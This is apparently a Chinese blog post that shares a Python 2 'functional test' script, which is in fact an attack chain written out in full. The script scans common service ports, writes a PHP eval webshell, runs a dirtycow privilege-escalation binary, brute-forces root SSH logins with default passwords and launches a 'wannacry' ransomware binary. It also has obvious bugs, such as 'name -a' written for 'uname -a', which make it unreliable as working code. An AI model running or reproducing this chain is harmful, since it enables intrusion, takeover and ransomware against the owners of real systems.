功能测试脚本一例

前言：

n久之前为测试写的脚本，都已经更新几个版本了。把最简单都版本放出来。

 

测试要求尽量少用第三方库。

 

# coding:utf-8
import socket
import sys
import os
import paramiko
# 扫描渗透溯源的端口
def scan_port(host):
    ports = [21, 22, 23, 53, 139, 445, 1433, 3306, 3389]
    target_ip = socket.gethostbyname(host)
    for port in ports:
        print "port scanning is %s " % port
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(2)
        result = sock.connect_ex((target_ip, port))
        if result == 0:
            print("open_port:" + port)
# 执行命令
def exec_system():
    print(os.system('whoami'))
    print(os.system('name -a'))
    print(os.system('cat /proc/version'))
# 使用dirtycow提权
def get_root(path):
    path = path + '/dirtycow'
    os.system("chmod +x {}".format(path))
    os.system("./{}".format(path))
# 生成脚本木马
def echo_webshell(path):
    path = path + '/webshell.php'
    with open(path, 'w') as f:
        f.writelines("<?php @eval($_POST['cmd']);?>")
# 远程连接ssh
def ssh_connect(host):
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    password = ['toor', 'admin123']
    for pwd in password:
        try:
            ssh.connect(hostname=host, port=22, username='root', password=pwd, timeout=5)
            ssh.close()
            print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
        except paramiko.AuthenticationException, e:
            pass
        except socket.error, e:
            pass
# 执行wannacry勒索脚本
def exec_wannacry(path):
    path = path + '/wannacry'
    os.system("chmod +x {}".format(path))
    os.system("./{}".format(path))
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('argument error')
        print('example:python checklist.py -h 127.0.0.1 -p /tmp/')
        exit(0)
    host = sys.argv[2]
    path = sys.argv[4]
    scan_port(host)
    echo_webshell(path)
    get_root(path)
    ssh_connect(host)
    exec_wannacry(path)